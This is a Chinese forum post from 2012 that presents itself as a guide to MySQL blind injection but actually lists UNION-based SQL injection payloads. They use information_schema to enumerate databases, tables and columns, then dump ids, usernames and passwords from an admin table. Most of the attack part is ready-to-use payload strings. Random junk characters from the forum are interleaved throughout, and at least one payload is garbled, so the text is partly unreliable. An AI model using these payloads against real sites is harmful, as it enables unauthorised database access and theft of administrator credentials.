本文介绍MYSQL盲注的一些语句和方法
4 d6 K/ c. [9 E! h+ v" {
6 t X' Z) j9 q# ], r学习盲注前先了解下 IFORMATION_SCHEMA 库" `/ [# d: W2 ?2 t/ ^% R
4 T! H t& g7 d" S1 y0 E( tMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有9 Q* z# \9 D6 T3 @4 B5 R/ Q
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。8 \9 B Q8 l, C; D
1.得到所有数据库名:* d- r3 @8 g3 K U
|SCHEMATA ->存储数据库名的表
0 S* A) v; c* s6 s|---字段:SCHEMA_NAME ->数据库名称! x5 `/ a3 b4 Y" ^# k0 G
. G+ [, U$ r9 w9 a+ [( \
|TABLES ->存储表名; T+ y" v2 r& L
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
5 A2 H( v/ _+ y/ b/ Q3 o3 h) F Z5 ||---字段:TABLE_NAME ->存储表的表名
0 r. r9 m& m5 m' E
+ P) a1 ^& L$ |- l6 t|COLUMNS ->存储的字段名表& N. A3 d# ]& h. C( Y6 J
|---字段:TABLE_SCHEMA ->该字段所属数据库名9 |/ v b2 l# o1 A! {- X
|---字段:TABLE_NAME ->存储所属表的名称- D q1 _* w. G$ A# f
! ?. a+ Z; |% S# T|---字段:COLUMN_NAME ->该字段的名称* g' U, P9 J9 ], k/ L
. o3 V- h; G" y
" Q0 E! ~! `9 Q8 X( Q4 H! s
1 G0 B L6 f3 y) c; y###########################################################################" S {5 z% y% W6 ]2 Q0 G
" m2 L6 N6 J4 \% J5 k: J8 x3 ?
0x001 获取系统信息:# K$ [ {+ d" d9 O( x
/ Z% ~* N- v+ U- Y( }1 junion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*: f7 ^8 b) p0 C& h, _5 E2 O q
* i: t4 y5 O9 v/*
- `3 R' c6 }; P4 w9 z4 {/ l' G# R4 i9 f- O
@@global.version_compile_os 获取系统版本
) G: D6 d" g) w6 v
, i8 F- B3 t) v@@datadir 数据库路径3 s& D* |8 l, w
database() 当前数据库名称7 M3 o }: p- K0 X
0x3c62723e 换行HEX值
* J2 g. h7 ~8 p4 R) ?) f# E
, y7 z3 M( R) I*/& q" @, E5 d" S; ~4 r0 k
) U. h* j( u" ~/ m% k+ k% v4 [
- U7 C' b; P6 w) y% G [& `5 Q3 ]$ {) {/ N# Q
######################################################################: }1 y L: i5 k4 I) [+ E7 z0 m
6 Z, W( k+ Q' Q: b0x002 获取表名4 n" M5 w a& }& a- A, h; X; Z R
9 B' f3 [; e @3 L, ~, B
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
4 i& m$ @6 W$ X: L& H
, D* b' F( i3 _2 u: s5 G- H
; R2 V C0 f& o9 L" Z* q# z* q1 u1 n' [; Z
/*
. `2 Q& g# C0 E" ?, h" ~2 q* o9 z# A, n: L0 H+ F
0x67617264656e 为当前数据库名3 m7 t4 M8 e- d! A" L& h7 V
1 w, h/ O3 f9 a% w T3 R4 z7 |
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名/ l" p* V' y Z, \2 K$ h" H" a
, e f$ B9 o. K6 D7 M" C*/% s& L! B& S2 M: w
. r1 B* R1 ?& \######################################################################
8 c8 u" C' Z7 l8 L+ p$ [$ ], L' U+ ?% u ~% R5 G
/ e- q! J" `2 E9 p+ S- F
9 P! J! y/ k' v* |3 q8 H1 A( ^0x003 获取字段6 H- E% Q, [$ U9 \$ t( U' A' K
7 P m6 d/ `& |2 p% z
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
/ q m/ o; _* c
% I9 k% i# ?& W; r/*
- r# G4 `; @2 s, g. }1 x6 q4 O1 Q7 Q5 ]
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段0 P/ }/ a, T7 f: h: M' Q. Q
" ~8 J2 A# Q+ D7 o/ w: ~. S
0x61646d696e ->选择一个表
# M3 X& m2 C! p3 o3 d! _8 f" b' p) @# _" I
0x67617264656e ->数据库名' T/ u$ a6 t" U1 O: k4 e6 f. x2 e
. h/ x- w9 d ]1 E a
*/+ O" @# e! H' b
4 l4 ^+ ?& L9 _% N#####################################################################& ?( ~( f- C% m5 M6 b) v
1 n6 S1 J7 u, Z% h' B
0 [, v/ \7 _& [8 C D. d; N3 D# N6 n2 y3 U& m/ F
0x004 获取数据9 [3 h, o1 \/ e9 J7 j0 b- w
( g! u" ^9 Q( q1 ?$ Funion select 1,2,3/ `1 q, n# O0 F
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
* z- O" K K2 s" `# O- b6 G; v
) e$ D6 x0 j9 C7 uunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
" s! B& ?5 h1 E2 D+ s p8 @* E. f" Z- i( x" k
8 ?) f: ~5 g1 u- ^: S. v
. F' l+ Y! ]& g3 L# g
/*+ x! ]6 {6 R3 J+ o% U8 t$ v* f
w- |" f1 {3 ?% M( j& l# [- a5 t0x3c62723e 换行符号HEX编码+ z- c2 M; f- K6 t0 \1 I
, t( h: C1 C/ [; e9 Q3 s
group_concat 同时获得该字段所有数据
+ k" n6 |* c3 T1 [8 o" K
8 N- F: u/ _: h7 f$ \8 A, Q*/
0 L8 M; |1 N6 p2 }
- S7 b+ d# Z0 G% u0 A- m8 K. G6 p3 ~ |
发表于 2012-9-13 17:48:44
收藏
支持
反对